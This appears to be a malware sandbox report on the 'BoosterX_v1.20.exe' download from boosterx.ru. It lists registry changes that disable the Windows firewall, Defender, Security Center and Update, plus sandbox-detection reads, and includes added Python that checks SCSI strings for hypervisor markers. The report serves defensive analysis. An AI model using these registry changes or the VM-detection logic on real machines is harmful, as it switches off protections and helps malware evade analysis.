Analysis
  max time kernel:   279s
  max time network:  1025s
  platform:          windows10-2004_x64
  resource:          win10v2004-20220414-en
  submitted:         21-05-2022 15:06
  Static task:       static1
  URLScan task:      urlscan1
  Behavioral task:   behavioral1
    Sample:          https://boosterx.ru
    Resource:        win10v2004-20220414-en

General
  Target:            https://boosterx.ru

Malware Config

Signatures
Modifies firewall policy service 2 TTPs 4 IoCs
Sets EnableFirewall to 0 for the Public and Standard (i.e. private) firewall profiles, which switches the Windows Defender Firewall off for those profiles.
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | reg.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | reg.exe
Modifies security service 2 TTPs 7 IoCs
Sets Start to 4 (SERVICE_DISABLED) on the Windows Defender Firewall (mpssvc), Microsoft Defender Antivirus (WinDefend), Security Center (wscsvc) and Windows Update (wuauserv) services, so none of them starts on the next boot.
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | cmd.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
  description | pid | process | target process
  PID 1108 created 2148 | 1108 | svchost.exe | BoosterX_v1.20.exe (5 entries)
  PID 1108 created 2116 | 1108 | svchost.exe | BoosterX_v1.20.exe
  PID 1108 created 2428 | 1108 | svchost.exe | Conhost.exe
  PID 1108 created 4648 | 1108 | svchost.exe | BoosterX_v1.20.exe
  PID 1108 created 4768 | 1108 | svchost.exe | BoosterX_v1.20.exe
  PID 1108 created 3764 | 1108 | svchost.exe | BoosterX_v1.20.exe
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
  pid | process
  692 | bcdedit.exe
  4632 | bcdedit.exe
Modifies Installed Components in the registry 2 TTPs

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | process
  File opened (read-only) | \??\D: | explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  163 | ipapi.co
Drops file in System32 directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoosterX_v1.20.exe.log | BoosterX_v1.20.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). This is common ransomware behaviour, but legitimate disk and system utilities do the same, so treat it as a weak signal on its own.
Checks SCSI registry key(s) 3 TTPs 13 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | BoosterX_v1.20.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | BoosterX_v1.20.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | BoosterX_v1.20.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc | BoosterX_v1.20.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | BoosterX_v1.20.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | taskmgr.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | taskmgr.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
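The three signatures above (SCSI enumeration, CentralProcessor reads, BIOS reads) are all ways of asking the registry "what hardware am I running on?", which is why sandboxes flag them. The Python below, added here as an example and not part of the Triage report, shows both halves of that: it parses an Enum\SCSI instance path into device class, vendor and product and compares the strings with common hypervisor markers (the check a sample would run), and it tallies per process which fingerprint sources were read (the check an analyst runs). The event rows are constructed from the report's IoCs plus rows from a hypothetical VirtualBox guest, and the (operation, path, process) record layout is an assumption.

```python
"""Rank processes by the VM/sandbox fingerprint sources they read from the registry.

Added example, not part of the Triage report. Event rows are constructed from
the SCSI, CentralProcessor and BIOS IoCs above plus constructed rows for a
hypothetical VirtualBox guest; the (operation, path, process) layout is an
assumption, not a Triage schema.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

Event = Tuple[str, str, str]  # (operation, registry path, process)

# Registry locations read to fingerprint the machine, keyed by what they reveal.
# Matching is on the path only; which value under the key is read does not matter.
FINGERPRINT_SOURCES = {
    "scsi": re.compile(r"\\SYSTEM\\(?:ControlSet\d{3}|CurrentControlSet)\\Enum\\SCSI\\", re.I),
    "cpu":  re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\", re.I),
    "bios": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\BIOS(?:\\|$)", re.I),
}

# Vendor/product fragments that name common hypervisors. The report's "DADY"
# strings are deliberately not here: a stock list like this matches nothing for them.
VM_MARKERS = ("VMWARE", "VBOX", "VIRTUALBOX", "QEMU", "XEN", "VIRTUAL", "INNOTEK", "PARALLELS")

# Enum\SCSI\<Class>&Ven_<vendor>&Prod_<product>\<instance id>
SCSI_DEVICE = re.compile(
    r"\\Enum\\SCSI\\(?P<cls>[^&\\]+)&Ven_(?P<vendor>[^&\\]+)&Prod_(?P<product>[^&\\]+)", re.I)


def parse_scsi_device(path: str) -> Optional[Tuple[str, str, str]]:
    """Extract (device class, vendor, product), upper-cased, from an Enum\\SCSI path."""
    m = SCSI_DEVICE.search(path)
    if not m:
        return None
    return tuple(m.group(g).upper() for g in ("cls", "vendor", "product"))  # type: ignore[return-value]


def looks_virtual(vendor: str, product: str) -> bool:
    """True if the vendor or product string names a known hypervisor."""
    text = f"{vendor} {product}".upper().replace("_", " ")
    return any(marker in text for marker in VM_MARKERS)


def categorize(path: str) -> Optional[str]:
    """Name the fingerprint source a registry path belongs to, if any."""
    for name, pattern in FINGERPRINT_SOURCES.items():
        if pattern.search(path):
            return name
    return None


def summarize(events: Iterable[Event]) -> Dict[str, Set[str]]:
    """Map each process to the set of fingerprint categories it touched."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for _op, path, proc in events:
        cat = categorize(path)
        if cat:
            seen[proc].add(cat)
    return dict(seen)


def scsi_identities(events: Iterable[Event]) -> Dict[Tuple[str, str, str], bool]:
    """Distinct SCSI devices read, with whether their strings look like a hypervisor's."""
    out: Dict[Tuple[str, str, str], bool] = {}
    for _op, path, _proc in events:
        dev = parse_scsi_device(path)
        if dev:
            out[dev] = looks_virtual(dev[1], dev[2])
    return out


_SCSI = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI"
_HW = r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System"
SAMPLE_EVENTS: List[Event] = [
    # Rows taken from the report.
    ("Key value queried", _SCSI + r"\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags", "BoosterX_v1.20.exe"),
    ("Key opened",        _SCSI + r"\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000", "BoosterX_v1.20.exe"),
    ("Key value queried", _SCSI + r"\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID", "BoosterX_v1.20.exe"),
    ("Key value queried", _SCSI + r"\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName", "taskmgr.exe"),
    ("Key opened",        _HW + r"\CentralProcessor\0", "taskmgr.exe"),
    ("Key value queried", _HW + r"\CentralProcessor\0\ProcessorNameString", "taskmgr.exe"),
    ("Key opened",        _HW + r"\BIOS", "chrome.exe"),
    ("Key value queried", _HW + r"\BIOS\SystemManufacturer", "chrome.exe"),
    # Constructed rows: the same reads on an unmasked VirtualBox guest.
    ("Key value queried", _SCSI + r"\Disk&Ven_VBOX&Prod_HARDDISK\4&1a2b3c4d&0&000000\FriendlyName", "sample.exe"),
    ("Key value queried", _HW + r"\BIOS\SystemManufacturer", "sample.exe"),
    ("Key value queried", _HW + r"\CentralProcessor\0\ProcessorNameString", "sample.exe"),
    # Constructed benign read that is not a fingerprint source.
    ("Key value queried", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName", "sample.exe"),
]

if __name__ == "__main__":
    for proc, cats in sorted(summarize(SAMPLE_EVENTS).items(), key=lambda kv: -len(kv[1])):
        print(f"{proc:20} {sorted(cats)}")
    for dev, virtual in scsi_identities(SAMPLE_EVENTS).items():
        print(f"{dev} virtual={virtual}")
```

The report's Ven_DADY disk and DVD-ROM match none of the hypervisor markers, which is the point of a sandbox presenting neutral device strings: a naive vendor-string check inside the sample comes back clean. From the analyst's side the stronger signal is the read itself; in this run only BoosterX_v1.20.exe and taskmgr.exe touched the SCSI tree, and Task Manager has an obvious legitimate reason to.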
Kills process with taskkill 3 IoCs
Processes:
  pid | process
  3180 | taskkill.exe
  3432 | taskkill.exe
  2464 | taskkill.exe
Modifies data under HKEY_USERS 25 IoCs
Processes:
  All keys below are under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  description | ioc | process
  Set value (int) | IntranetName = "1" | BoosterX_v1.20.exe
  Set value (int) | ProxyBypass = "1" | BoosterX_v1.20.exe
  Key created | ZoneMap\ | reg.exe
  Set value (int) | IntranetName = "1" | reg.exe
  Set value (int) | AutoDetect = "0" | cmd.exe
  Set value (int) | ProxyBypass = "1" | cmd.exe
  Key created | ZoneMap\ | reg.exe
  Set value (int) | ProxyBypass = "1" | reg.exe
  Set value (int) | ProxyBypass = "1" | BoosterX_v1.20.exe
  Set value (int) | UNCAsIntranet = "1" | BoosterX_v1.20.exe
  Set value (int) | UNCAsIntranet = "1" | BoosterX_v1.20.exe
  Set value (int) | ProxyBypass = "1" | reg.exe
  Key created | ZoneMap\ | cmd.exe
  Set value (int) | AutoDetect = "0" | reg.exe
  Set value (int) | UNCAsIntranet = "1" | reg.exe
  Set value (int) | IntranetName = "1" | BoosterX_v1.20.exe
  Set value (int) | AutoDetect = "0" | BoosterX_v1.20.exe
  Set value (int) | AutoDetect = "0" | reg.exe
  Set value (int) | UNCAsIntranet = "1" | cmd.exe
  Set value (int) | IntranetName = "1" | reg.exe
  Key created | ZoneMap\ | BoosterX_v1.20.exe
  Set value (int) | AutoDetect = "0" | BoosterX_v1.20.exe
  Key created | ZoneMap\ | BoosterX_v1.20.exe
  Set value (int) | UNCAsIntranet = "1" | reg.exe
  Set value (int) | IntranetName = "1" | cmd.exe
Modifies registry class 21 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\FriendlyTypeName = "Power Plan" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import | reg.exe
  Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{E50D0B86-5C91-40A0-9038-568ABD0E75D1} | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | explorer.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon\ = "%C:\\Windows%\\System32\\powercfg.cpl,-202" | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command\ = "powercfg /import \"%1\"" | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | explorer.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | explorer.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | chrome.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | explorer.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\ = "Power Plan" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.pow | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (64 entries, repeated pid/process rows collapsed):
  pid | process | entries
  1816 | chrome.exe | 2
  1732 | chrome.exe | 2
  1784 | chrome.exe | 2
  4728 | chrome.exe | 4
  3088 | chrome.exe | 2
  2148 | BoosterX_v1.20.exe | 7
  2720 | chrome.exe | 2
  800 | chrome.exe | 2
  2116 | BoosterX_v1.20.exe | 2
  2428 | Conhost.exe | 2
  4648 | BoosterX_v1.20.exe | 2
  4768 | BoosterX_v1.20.exe | 2
  3764 | BoosterX_v1.20.exe | 2
  960 | taskmgr.exe | 27
  2340 | chrome.exe | 4
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
  pid | process
  2148 | BoosterX_v1.20.exe
  960 | taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
  pid | process
  1732 | chrome.exe (3 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (64 entries, repeated rows collapsed; pid 2428 is reported once as BoosterX_v1.20.exe and once as Conhost.exe, as in the original):
  Token | pid | process | entries
  SeDebugPrivilege | 2148 | BoosterX_v1.20.exe | 6
  SeTcbPrivilege | 1108 | svchost.exe | 2
  SeDebugPrivilege | 2428 | BoosterX_v1.20.exe | 1
  SeDebugPrivilege | 2116 | BoosterX_v1.20.exe | 2
  SeDebugPrivilege | 4768 | BoosterX_v1.20.exe | 2
  SeDebugPrivilege | 4648 | BoosterX_v1.20.exe | 2
  SeDebugPrivilege | 3764 | BoosterX_v1.20.exe | 2
  SeDebugPrivilege | 2428 | Conhost.exe | 1
  SeDebugPrivilege | 5024 | BoosterX_v1.20.exe | 1
  SeDebugPrivilege | 1888 | BoosterX_v1.20.exe | 1
  SeDebugPrivilege | 2260 | BoosterX_v1.20.exe | 1
  SeDebugPrivilege | 5112 | reg.exe | 1
  SeDebugPrivilege | 432 | cmd.exe | 1
  SeDebugPrivilege | 3180 | taskkill.exe | 1
  SeLoadDriverPrivilege | 2148 | BoosterX_v1.20.exe | 9
  SeDebugPrivilege | 3432 | taskkill.exe | 1
  SeDebugPrivilege | 960 | taskmgr.exe | 1
  SeSystemProfilePrivilege | 960 | taskmgr.exe | 1
  SeCreateGlobalPrivilege | 960 | taskmgr.exe | 1
  SeShutdownPrivilege | 2236 | powercfg.exe | 1
  SeCreatePagefilePrivilege | 2236 | powercfg.exe | 1
  SeShutdownPrivilege | 3376 | powercfg.exe | 1
  SeCreatePagefilePrivilege | 3376 | powercfg.exe | 1
  SeDebugPrivilege | 2228, 1944, 4196, 1400, 4736, 2240, 4468, 2168, 3104, 4580, 4824, 4488, 2396, 4800, 3984, 3840 | powershell.exe | 16 (one per pid)
  SeDebugPrivilege | 2464 | taskkill.exe | 1
  SeShutdownPrivilege | 2376 | explorer.exe | 3
  SeCreatePagefilePrivilege | 2376 | explorer.exe | 3
Suspicious use of FindShellTrayWindow 64 IoCs
Processes (64 entries, repeated pid/process rows collapsed):
  pid | process | entries
  1732 | chrome.exe | 34
  2148 | BoosterX_v1.20.exe | 2
  960 | taskmgr.exe | 28
Suspicious use of SendNotifyMessage 64 IoCs
Processes (64 entries, repeated pid/process rows collapsed):
  pid | process | entries
  1732 | chrome.exe | 24
  960 | taskmgr.exe | 40
Suspicious use of WriteProcessMemory 64 IoCs
Processes (64 entries, repeated rows collapsed):
  description | pid | process | target process | entries
  PID 1732 wrote to memory of 776 | 1732 | chrome.exe | chrome.exe | 2
  PID 1732 wrote to memory of 1660 | 1732 | chrome.exe | chrome.exe | 38
  PID 1732 wrote to memory of 1816 | 1732 | chrome.exe | chrome.exe | 2
  PID 1732 wrote to memory of 1488 | 1732 | chrome.exe | chrome.exe | 22
Processes
Process tree; [1] is the root process, [2] entries are its children.

[1] C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://boosterx.ru
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabeac4f50,0x7ffabeac4f60,0x7ffabeac4f70

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4852 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5440 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1176 /prefetch:8

  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
